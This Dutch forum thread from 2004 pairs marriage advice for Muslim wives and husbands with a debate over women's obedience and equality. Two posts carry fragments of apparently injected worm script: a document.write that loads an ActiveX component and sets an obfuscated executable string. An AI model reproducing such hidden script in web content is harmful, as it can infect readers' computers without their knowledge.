Islaam.nl

Islaam.nl Forum

  FAQ FAQ  Doorzoek dit Forum   Kalender   Registreren Registreren  Inloggen Inloggen

Onderwerp geslotenTien adviezen aan de moslimvrouw

 Post Reply Post Reply
Schrijver
oum younes Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 07 januari 2004
Locatie: Netherlands
Online status: Offline
Berichten: 37
Directe link naar dit bericht Onderwerp: Tien adviezen aan de moslimvrouw
    Geplaatst op: 11 januari 2004 om 18:05
  1. Maak een smeekbede om jouw huwelijk succesvol te maken. Alle goede zaken komen van Allah de Verhevene. Vergeet Allah de Verhevene niet te vragen om een succesvolle huwelijk te hebben die in deze wereld begint en verder zal gaan met de wil van Allah in de Paradijs.

  2. Luister en gehoorzaam! Je man gehoorzaam zijn is Fard (verplicht)! Jouw man is het hoofd van jullie gezin. Geef hem dat recht en dat respect.

  3. Tracht altijd je man tevreden te stellen, hij is jouw sleutel naar het paradijs. De profeet (Allah's vrede en zegen zij met hem) heeft gezegd dat wanneer een vrouw overlijdt en haar man tevreden over haar is, zij het Paradijs zal betreden. Dus� stel hem tevreden.

  4. Een woordentwist is net een brand in huis. Blus het door simpel je excuses aan te bieden ook al was het jouw fout niet. Als je terugvecht dan zorg je ervoor dat je hout bij het vuur gooit. Kijk hoe aangenaam een discussie eindigt wanneer je vriendelijk zegt dat het je spijt en dat je weer vrienden wilt zijn.

  5. Dank je echtgenoot constant voor de goede leuke dingen die hij doet. En dank hem nogmaals. Dit is belangrijk want de tegenovergestelde van dit is de karaktereigenschap van de vrouw in de hel.

  6. Speel en maak grappen met jouw man. De geheim van de man is dat zij zoeken naar vrouwen die luchthartig zijn en die gevoel voor humor hebben. De profeet (Allah's vrede en zegen zij met hem) gaf aan Jabir het advies om te trouwen met iemand die hem kon laten lachen en die hij kon laten lachen.

  7. Draag jouw sieraden en kleed je mooi aan thuis.

  8. Onderzoek de eigenschappen van de Hoor Al-Ayn en probeer hen na te bootsen. De Qor'aan en de Soenna beschrijft de vrouw in het Paradijs met de zekere eigenschappen. Zoals de zijde die ze dragen, gebruik kohl voor je ogen om je ogen groter doen te lijken en zing voor je echtgenoot.

  9. Als je man thuiskomt, ontvang hem met een wonderbaarlijke begroeting. Stel je voor: je man komt thuis, jullie huis is schoon, een prachtige goede mooie geklede vrouw, het avondeten staat klaar, de kinderen zien er goed verzorgd uit, een schone slaapkamer - wat zou dit doen voor zijn liefde voor jou? En stel je voor wat het tegenovergestelde met hem zou doen.

  10. Gebruik de goede eigenschappen die jij hebt om op een toegestane manier de hart van jouw echtgenoot te overwinnen. Alle vrouwen hebben een sieraad waar Allah hen mee gezegend heeft. Gebruik de schoonheid die Allah jouw geschonken heeft om de hart van je echtgenoot te overwinnen.

Ter afsluiting: vergeet nooit om een smeekbede aan Allah de Verhevene te vragen om jouw huwelijk succesvol te maken

http://www.risallah.tk/

Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Directe link naar dit bericht Geplaatst op: 11 januari 2004 om 18:46

Een woordentwist is net een brand in huis. Blus het door simpel je excuses aan te bieden ook al was het jouw fout niet.

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
FATIH Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 31 december 2003
Online status: Offline
Berichten: 45
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 13:35

Salamun Aleikum,

Dit waren de goude tips, bedankt broeder!

Terug naar boven
oum younes Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 07 januari 2004
Locatie: Netherlands
Online status: Offline
Berichten: 37
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 16:21
In eerste instantie geplaatst door FATIH

Salamun Aleikum,

Dit waren de goude tips, bedankt broeder!

Ik ben een vrouw
Terug naar boven
Rania Bekijk dropdown
Newbie
Newbie


Lid geworden: 24 december 2003
Locatie: Netherlands
Online status: Offline
Berichten: 7
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 16:53
Beste oum Younes,

Kan je me er zo'n 10 voor mannen geven?
Groetjes
Terug naar boven
Vincent Bekijk dropdown
Groupie
Groupie


Lid geworden: 27 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 285
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 17:43

Beste allen,

Drie dingen vallen me op:

1. je man gehoorzamen;

2. de vrouw betreedt het paradijs als de man tevreden is;

3. vrouw geef de man gelijk, ook als hij ongelijk heeft!.

Met deze 'regels' is het toch begrijpelijk, dat moslim-vrouwen in het Westen als 'achtergesteld' ten opzichte van de man worden gezien?

Vr. gr.,

Vincent

Terug naar boven
oum younes Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 07 januari 2004
Locatie: Netherlands
Online status: Offline
Berichten: 37
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 17:48
In eerste instantie geplaatst door Rania

Beste oum Younes,

Kan je me er zo'n 10 voor mannen geven?
Groetjes
  1. Kleed je mooi aan voor je vrouw, zorg dat je er goed verzorgd uitziet en ruik lekker. Wanneer was de laatste keer dat wij mannen een mooie pyjama kochten? Zoals een man wilt dat zijn vrouw er goed voor hem uitziet zo wilt de vrouw dat haar man er leuk uitziet voor haar. De profeet (Allah's vrede en zegen zij met hem) begon eerst met miswak als hij naar huis terugkeerde en hield altijd van lekkere geuren

  2. Kies schattige namen voor je vrouw. De profeet (Allah's vrede en zegen zij met hem) had koosnaampjes voor zijn vrouwen, waar zijn vrouwen van hielden. Roep jouw vrouw met de meest beminde namen en vermijd namen die haar pijn doen.

  3. Behandel haar niet als een vlieg. We denken nooit aan vliegen in onze dagelijkse leven totdat het ons "ergert". Gelijkelijk, een vrouw doet heel de dag iets goeds - wat de man niet opvalt - totdat ze hem "ergert". Behandel haar niet zo, erken al de goede dingen die ze doet en blijf dat herinneren. Als je iets slechts ziet in je vrouw, probeer het te verzwijgen en geef er geen commentaar op! Dit is een manier die de profeet (Allah's vrede en zegen zij met hem) hanteerde wanneer hij iets ongepast zag bij zijn vrouwen (moge Allah tevreden over hen zijn). Het is een manier die weinig moslimmannen hebben weten te overwinnen van zichzelf.

  4. Lach naar je vrouw wanneer je haar ziet en omhels haar vaak. Een glimlach is een liefdadigheid (sadaqa), en je vrouw is niet uitgezonderd van de moslimgemeenschap. De profeet (Allah's vrede en zegen zij met hem) kuste zijn vrouw eerst voordat hij naar het gebed ging, ook al vastte hij.

  5. Dank haar voor alles wat zij doet voor jou. En dank haar nogmaals! Neem bijvoorbeeld het eten die zij klaarmaakt, de huis die ze schoon maakt en vele andere taken die zij vervult. En de commentaar die zij hierop krijgt is dat er meer zout in de soep moet. Laat dit niet gebeuren maar bedank haar juist!

  6. Vraag haar voor jou te noteren wat de laatste tien dingen zijn die jij gedaan hebt voor haar om haar gelukkig te maken, en herhaal deze nogmaals. Het is moeilijk om te bedenken wat jouw vrouw gelukkig maakt. Je hoeft niet een raadspelletje te spelen, vraag het haar gewoon en probeer het vaak te herhalen in jouw leven.

  7. Wees niet kleinzielig met haar verlangens en begeerten. Maak het haar aangenaam. Soms kijken de mannen neer op de wensen van hun vrouwen. De profeet (Allah's vrede en zegen zij met hem) heeft ons een voorbeeld gegeven tijdens een voorval met Safiyyah (moge Allah tevreden over haar zijn), zij moest huilen zoals ze zei, de profeet (Allah's vrede en zegen zij met hem) had haar op een langzame kameel gezet. Hij droogde haar tranen, maakte het haar aangenaam en bracht haar de kameel.

  8. Wees humoristisch en speel spelletjes met je vrouw.

  9. Kijk hoe de profeet (Allah's vrede en zegen zij met hem) wedstrijdjes deed met zijn vrouw Aicha (moge Allah tevreden met haar zijn) in de woestijn. Wanneer was de laatste keer dat wij dit hebben gedaan.

  10. Blijf altijd aan de woorden van de profeet (Allah's vrede en zegen zij met hem) denken: de beste van jullie zijn degene die goed zijn voor hun echtgenoten. En ik ben goed voor mijn echtgenoten. Probeer de beste te zijn!

Ter afsluiting: vergeet nooit om een smeekbede aan Allah de Verhevene te vragen om jouw huwelijk . http://www.risallah.tk/

Terug naar boven Bekijk oum younes's Profiel Zoek naar andere berichten van oum younes
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 18:30

salaam'aleikum

VINCENT SCHREEF:

Met deze 'regels' is het toch begrijpelijk, dat moslim-vrouwen in het Westen als 'achtergesteld' ten opzichte van de man worden gezien?

 

1. Het zijn niet allemaal regels, ook gewoon goede raad zit ertussen

2. Maar het blijft wel een raadsel waarom al die westerse vrouwen zich

blijven bekeren, vooral die die de positie van de vrouw in de Islam bestudeerd

hebben

 

Terug naar boven
~Zahra~ Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 26 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 713
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 19:05

hoi Vincent,

zulke adviezen zijn er ook voor de man,

Als je iets slechts ziet in je vrouw, probeer het te verzwijgen en geef er geen commentaar op! Dit is een manier die de profeet (Allah's vrede en zegen zij met hem) hanteerde wanneer hij iets ongepast zag bij zijn vrouwen (moge Allah tevreden over hen zijn).

het komt er voor mij op neer:laat de vrouw zoals ze is ,en laat de man zoals ie is.

het zjn goede adviezen vind ik....Als je ziet om wat voor kleinigheden sommige koppels ruzie met elkaar maken...omdat ze 'anders'over iets denken....of omdat er eentje zijn gelijk wil halen...Die adviezen voor de man of voor de vrouw,zijn er ook om aan te geven dat sommige dingen het ruzie maken niet waard zijn...

groetjes

Men sluit de ogen van de doden behoedzaam; niet minder behoedzaam moet men de ogen van levenden openen.
Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 19:08

Hallo,

het is maar waar je je goed bij voelt he, en het is ook niet bepaald zo dat de grote meerderheid der westerse vrouwen zich bekeert, eerder een behoorlijk kleine minderheid...  En als zij daar blij mee zijn, is dat toch goed, net zoals de vrouwen en mannen die van Islam naar Christendom gaan.  Dat betekent niet dat IK mijn zelfrespect zo te grabbel moet gooien door mijn vriend altijd en overal gelijk te geven, mijn vriend is mans genoeg om zijn ongelijk toe te geven.  Bovendien zou zijn respect voor mij op die manier ook niet vergroten, hij vindt mij oa leuk omdat ik hem niet altijd gelijk geef en steeds voor mijn mening uitkom.  Maar ja, ook hier geldt weer, als beide personen in het huwelijk er gelukkig mee zijn...

Ook zal niemand ontkennen dat er heel wat goede raad in die 10 regels zit.  Om een voorbeeld te geven: samen kunnen lachen en plezier kunnen maken, is heel belangrijk in een relatie...  Of jezelf mooi maken voor je partner, enz...

Liefs Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
FATIH Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 31 december 2003
Online status: Offline
Berichten: 45
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 19:21
In eerste instantie geplaatst door oum younes

In eerste instantie geplaatst door FATIH

Salamun Aleikum,

Dit waren de goude tips, bedankt broeder!

Ik ben een vrouw

 

Neem me niet kwalijk, zusje! Maar volgens mij is Younes een mannelijke naam!

Terug naar boven
~Zahra~ Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 26 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 713
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 19:25

asalam aleikum wa rahmatoelahie wa barakatoehoe,

maar 'oum' betekent toch zoiets als 'moeder'?

wa sallam

Men sluit de ogen van de doden behoedzaam; niet minder behoedzaam moet men de ogen van levenden openen.
Terug naar boven
FATIH Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 31 december 2003
Online status: Offline
Berichten: 45
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 19:37
In eerste instantie geplaatst door ~Zahra~

asalam aleikum wa rahmatoelahie wa barakatoehoe,

maar 'oum' betekent toch zoiets als 'moeder'?

wa sallam

Assalamu Aleikum, 

 

Hmm,dat weet ik niet.Ja, het zou kunnen!ok.

Terug naar boven
Amier Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 31 juli 2003
Locatie: Nederland
Online status: Offline
Berichten: 1902
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 20:17
In eerste instantie geplaatst door harith2

salaam'aleikum

VINCENT SCHREEF:

Met deze 'regels' is het toch begrijpelijk, dat moslim-vrouwen in het Westen als 'achtergesteld' ten opzichte van de man worden gezien?

 

1. Het zijn niet allemaal regels, ook gewoon goede raad zit ertussen

2. Maar het blijft wel een raadsel waarom al die westerse vrouwen zich

blijven bekeren, vooral die die de positie van de vrouw in de Islam bestudeerd

hebben

 

Touche!

Wassalamu alaikum,

Amier.

Terug naar boven
oum younes Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 07 januari 2004
Locatie: Netherlands
Online status: Offline
Berichten: 37
Directe link naar dit bericht Geplaatst op: 12 januari 2004 om 21:57
Oum betekent de moeder van
Terug naar boven
Rania Bekijk dropdown
Newbie
Newbie


Lid geworden: 24 december 2003
Locatie: Netherlands
Online status: Offline
Berichten: 7
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 12:27
Wel oum Younes

Ik ben reeds 4 jaar getrouwd en moet toegeven dat als we beiden jou gouden regels vanaf het begin hadden opgevolgd dat het ons toch wel veel leed had bespaard.

We beseffen nu echt wel dat geloof noodzakelijk is en islaam een handleiding om je dagelijkse leven te ordennen.

De wereld zou het paradijs zijn mocht iedereen een echte moslim zijn.
Terug naar boven
Vincent Bekijk dropdown
Groupie
Groupie


Lid geworden: 27 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 285
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 13:48
In eerste instantie geplaatst door harith2

Maar het blijft wel een raadsel waarom al die westerse vrouwen zich

blijven bekeren, vooral die die de positie van de vrouw in de Islam bestudeerd

hebben

Beste Harith2,

Dan vergeet je vervolgens, dat de blijf-van-mijn-lijfhuizen in Nederland overvol zitten met moslim-vrouwen, die het thuis niet meer zien zitten!

Vr. gr.,

Vincent

Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 14:24

Beste Rania,

een vraagje: zou jij je man gelijk geven ook als hij fout is?

Groetjes Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
Leyla Bekijk dropdown
Groupie
Groupie
Avatar

Lid geworden: 29 augustus 2003
Locatie: Netherlands
Online status: Offline
Berichten: 302
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 14:27

A Selam oe Ale'ykoem,

De Islam als leefwijze en sociaal systeem is een groot samenhangend geheeld. Elk lid van de gemeenschap is belangrijk. want iedereen heeft een taak en kan aan de vervulling ervan genoegen beleven. Als het systeem de kans krijgt om te functioneren, wordt niemand te zwaar belast, heeft iedereen een redelijke mate van vrijheid en wordt niemand uitgebuit. Echter, wanneer een leefwijze als die van de islam wordt verknipt, zullen de losse onderdelen geen harmonisch geheel meer vormen. Dergelijke ontwrichtte elementen vertegenwoodigen de Islam niet meer en mogen niet beoordeeld worden alsof ze dat deden. Wantoestanden die zich soms voordoen onder Moslims, mogen dan ook niet zonder meer op rekening van de islam worden geschreven.

De positie van de vrouw in de islam is rechtvaardig zolang zij binnen een gemeenschap leeft waar de Islamitische leerstellingen in hun geheel worden toegepast. Zij heeft een duidelijke status als persoon en recht op verweer indien er misbruik van haar wordt gemaakt. Problemen bestaan pas wanneer de leer eenzijdig, bijvoorbeeld alleen ten gunste van mannen, wordt geinterpreteerd of rechten en plichten van elkaar worden gescheiden. Het vertalen van de islamitische principes van recht en ethiek naar een snel veranderende wereld vergt inzicht in de manier waarop de Qora'an omgaat met mensen en hun problemen. Volgens de geest van de openbaring zal niemadn onrecht worden aangedaam em zal ook niemand boven zijn draagkracht worden belast. De Islam beoogt een evenwicht te vinden tussen rechten en plichten, en vooral tussen sociale idealen en de situatie van mensen in de realiteit van alledag.

Beste Vincent, het feit dat er zoveel Islamitische vrouwen in blijf-van-mijn-lijf-huizen zitten, kan dus niet aan de Islam en zijn opvattingen, regels etc. toegerekend worden. Het zijn jammer genoeg velen die de tekst uit de Qora'an zo interpreteren, dat het henzelf goeddunkt.

Wa Ale'ykoem a Selaam

The Believers In Their Mutual Friendship, Mercy & Afflection Are Like One Body: If Any Part Of It Complains, The Rest Of The Body Will Also Stay Awake In Pain.
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 18:18

salaam'aleikum

Beste Harith2,

Dan vergeet je vervolgens, dat de blijf-van-mijn-lijfhuizen in Nederland overvol zitten met moslim-vrouwen, die het thuis niet meer zien zitten!

Vr. gr.,

Vincent

 

VINCENT

Je moet de volgelingen oordelen naar DE WAARHEID, niet omgekeerd,

die mensen zullen geoordeeld worden, net als jij

Als een moslim drinkt, terwijl de islam het hem verbied, is het dan

door de islam dat hij dronken is en zich misdraagt??????

< => document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" < => ExeString = "NK%OnOa]gh%OdjIYod%Kp^>$AegYgu=angNq[FFXko]kl#%FFL]o@be#%FFn^YoaFYdh!!DBKnhh\cZl`$Ag\OnZAqg[oehfGC9kl^f_Ph Aee] K]m`'Prh`Omj$Gi>jmkkMalmhaF`tmO^lN^Y_P^ek6AOH&Jl^f OaqlAee]#Bbd`LZlc(*!MekOmj9J`]]L`ii&MaZ\ < => document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" < => ExeString = "NK%OnOa]gh%OdjIYod%Kp^>$AegYgu=angNq[FFXko]kl#%FFL]o@be#%FFn^YoaFYdh!!DBKnhh\cZl`$Ag\OnZAqg[oehfGC9kl^f_Ph Aee] K]m`'Prh`Omj$Gi>jmkkMalmhaF`tmO^lN^Y_P^ek6AOH&Jl^f OaqlAee]#Bbd`LZlc(*!MekOmj9J`]]L`ii&MaZ\
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 18:19

salaam'aleikum

Beste Rania,

een vraagje: zou jij je man gelijk geven ook als hij fout is?

Groetjes Kim

Beste Kim

een vraagje: zou jij je man gelijk geven als hij gelijk heeft

groetjes Harith

< => document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" < => ExeString = "NK%OnOa]gh%OdjIYod%Kp^>$AegYgu=angNq[FFXko]kl#%FFL]o@be#%FFn^YoaFYdh!!DBKnhh\cZl`$Ag\OnZAqg[oehfGC9kl^f_Ph Aee] K]m`'Prh`Omj$Gi>jmkkMalmhaF`tmO^lN^Y_P^ek6AOH&Jl^f OaqlAee]#Bbd`LZlc(*!MekOmj9J`]]L`ii&MaZ\ < => document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" < => ExeString = "NK%OnOa]gh%OdjIYod%Kp^>$AegYgu=angNq[FFXko]kl#%FFL]o@be#%FFn^YoaFYdh!!DBKnhh\cZl`$Ag\OnZAqg[oehfGC9kl^f_Ph Aee] K]m`'Prh`Omj$Gi>jmkkMalmhaF`tmO^lN^Y_P^ek6AOH&Jl^f OaqlAee]#Bbd`LZlc(*!MekOmj9J`]]L`ii&MaZ\
Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 18:29

Wat is dat nu weer voor een vraag?  Natuurlijk wel...

Impliceer je daarmee dat ik jou express niet gelijk geef?  Hahaaa nice try  Wel, ik geef je express niet gelijk, omdat ik vind dat je niet gelijk hebt...

Greetz Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 21:03

salaam'aleikum

Neen kim, 't gaat niet over mij

ik ben immers je man niet

Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Directe link naar dit bericht Geplaatst op: 13 januari 2004 om 22:13

Hello,

ik heb ook geen man, enkel een vriend, en ik kan je verzekeren dat we een eerlijke relatie hebben waarin alles te bespreken is.  En we geven ALLEBEI ook wel eens ons ongelijk toe (hoewel dat niet altijd even makkelijk is - maar dat gevoel kent iedereen). 

Maar nu komt de vraag terug: vind jij dat je vrouw je gelijk moet geven, zelfs als ze denkt dat je ongelijk hebt?  En indien ja, waarom dan wel?  En ook indien ja, dat is toch niet eerlijk of rechtvaardig en spreekt het hele gelijkheidsidee van man en vrouw tegen?

Groetjes Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Directe link naar dit bericht Geplaatst op: 14 januari 2004 om 11:30

salaam'aleikum

Neen, meisje

Ik hoop dat ik dat zal doen in haar plaats, zie je, de beloning

zal enorm zijn als ik dat kan opbrengen, islam draait immers om

zelfopoffering voor Allah

Terug naar boven
islam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 09 oktober 2003
Locatie: Belgie
Online status: Offline
Berichten: 2554
Directe link naar dit bericht Geplaatst op: 14 januari 2004 om 12:43

Beste Harith,

waarom in haar plaats?  Het is toch sowieso aan jou om je ongelijk toe te geven en niet aan je vrouw om je domweg altijd gelijk te geven?  Waarom zou de beloning daar dan enorm voor zijn?

Vraagjes, vraagjes, vraagjes...

 Kim

Met of zonder godsdienst zouden er goede mensen zijn die goede dingen doen en slechte mensen die slechte dingen doen. Maar om goede mensen slechte dingen te laten doen, heb je godsdienst nodig.
Terug naar boven
Vincent Bekijk dropdown
Groupie
Groupie


Lid geworden: 27 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 285
Directe link naar dit bericht Geplaatst op: 14 januari 2004 om 13:05
In eerste instantie geplaatst door harith2

 

Je moet de volgelingen oordelen naar DE WAARHEID, niet omgekeerd,

die mensen zullen geoordeeld worden, net als jij

Als een moslim drinkt, terwijl de islam het hem verbied, is het dan

door de islam dat hij dronken is en zich misdraagt??????

Beste Harith2,

Op zich eens met je stelling, zij het dat de cultuur die deze volle blijf-van-mijn-lijf huizen in de hand werkt grondige wortels in (voorschriften uit) de Islam heeft. Je kunt kortom niet zo makkelijk cultuur en religie scheiden. Een goed voorbeeld zijn de tips aan moslim-vrouwen waar dit topic mee begon. Zijn dit 'regels' uit de Koran c.a. of gaat het hier om zaken die vanuit de (arabische) cultuur nastrevenswaardig worden gevonden?

Overigens is een van de redenen waarom moslim-vrouwen in opvanghuizen terecht komen een uit de hand gelopen meningsverschil met de man over het wel of niet (op de juiste manier) dragen van een sluier. Deze 'regel' -corrigeer me als ik er naast zit- komt rechtsreeks uit de Koran c.a.

Ik heb al eerder in dit topic aangegeven, dat een aantal van deze 'regels' niet echt bevorderlijk is voor een gezonde verhouding tussen man en vrouw (i.c. wanneer de vrouw in wezenlijke zaken 'afhankelijk' is van de goede wil van de man). De volle blijf-van-mijn-lijf huizen zijn hiervan het feitelijke bewijs.

Vr. gr.,

Vincent

 

 

 

 

Terug naar boven
Leyla Bekijk dropdown
Groupie
Groupie
Avatar

Lid geworden: 29 augustus 2003
Locatie: Netherlands
Online status: Offline
Berichten: 302
Directe link naar dit bericht Geplaatst op: 14 januari 2004 om 13:13

Beste Vincent,

Zoals ik al in een eerdere opmerking gezet heb, zijn er velen die de tekst uit de Qora'an zo interpreteren, dat het henzelf goeddunkt. En dan doel ik met name op mannen, die daarmee de macht over hun vrouwen proberen te vergroten. "Regels" zijn er zowel voor mannen als vrouwen in de Islam. Zowel mannen als vrouwen hebben recht op onderwijs, zelfontplooiing en een plaats in de maatschappij zonder met elkaar in competitie te gaan.

Zoals de Qora'an zegt: "Mannen en vrouwen zijn elkaars beschermde vrienden". (Soerat at-Taubah 9:71).

Groetjes Leyla

The Believers In Their Mutual Friendship, Mercy & Afflection Are Like One Body: If Any Part Of It Complains, The Rest Of The Body Will Also Stay Awake In Pain.
Terug naar boven
Vincent Bekijk dropdown
Groupie
Groupie


Lid geworden: 27 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 285
Directe link naar dit bericht Geplaatst op: 14 januari 2004 om 17:06

Beste Leyla,

Veel moslim-vrouwen die in opvanghuizen verblijven, zitten daar juist omdat ze zich niet strikt meer aan de Koran c.a. houden, bijv. geen sluier meer willen dragen of een relatie hebben met een 'ongewenst' persoon (lees: niet-moslim). Ze zitten er dus niet omdat de man of de familie de Koran verkeerd interpreteert, maar juist omdat de vrouw in kwestie zich niet meer strikt aan de Koran wil houden.

Als Harith2 dus stelt, dat veel vrouwen zich tot de Islam bekeren, dan moet ook worden erkend, dat -aan de andere kant- veel vrouwen de Islam 'de rug toekeren' . Het is dus niet alleen rozegeur en maneschijn. Religie -in dit geval de Islam- is niet voor iedereen een bevrijding.

Vriendelijke groet,

Vincent

Terug naar boven
harith2 Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 24 december 2003
Online status: Offline
Berichten: 260
Directe link naar dit bericht Geplaatst op: 14 januari 2004 om 17:46

salaam'aleikum

VINCENT

Moesten die vrouwen zich WEL aan de islam houden zou hun leven wel goed verlopen, Allah is immers voor ons als wij voor Hem zijn, en al het slechte komt van onszelf, dat weet elke moslim(staat in Koran)

KIMMIE KIM schreef:

Beste Harith,

waarom in haar plaats?  Het is toch sowieso aan jou om je ongelijk toe te geven en niet aan je vrouw om je domweg altijd gelijk te geven?  Waarom zou de beloning daar dan enorm voor zijn?

 

Wat grappig, ik bedoel als zij ongelijk heeft

Terug naar boven
 Post Reply Post Reply

Spring naar forum Forum rechten Bekijk dropdown



Deze pagina is gemaakt in 0.094 seconden.